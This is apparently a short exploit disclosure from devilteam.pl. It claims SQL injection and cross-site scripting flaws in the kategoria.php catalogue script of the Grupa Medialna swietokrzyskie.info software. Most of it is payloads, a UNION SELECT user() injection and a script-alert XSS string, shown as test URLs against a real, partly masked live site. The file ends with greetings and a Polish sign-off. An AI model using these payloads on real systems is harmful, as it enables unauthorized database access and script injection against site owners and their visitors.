################################
#
# sql injection& XSS bug by Demon
#
# devilteam.pl
#
################################
# Title : Grupa Medialna swietokrzyskie.info <= SQLi & xss
# Author : Demon
# Tested on : ubuntu 10.10
#Exploits:
katalog/kategoria.php?action=lokalne&k=(sql)
katalog/kategoria.php?action=lokalne&k="><script>alert("1")</script>
test:
http://ch********nik24.pl/katalog/kategoria.php?action=lokalne&k=13 union select user()--
http://ch********ik24.pl/katalog/kategoria.php?action=lokalne&k="><script>alert("1")</script>
Gretzy:
Devilteam.pl
######################
Extra Gretzy :Mojej kobiecie za Wyrozumialosc
######################
Serdecznie olewam tych ,ktorzy mysla ,ze sa moimi przyjaciolmi!!!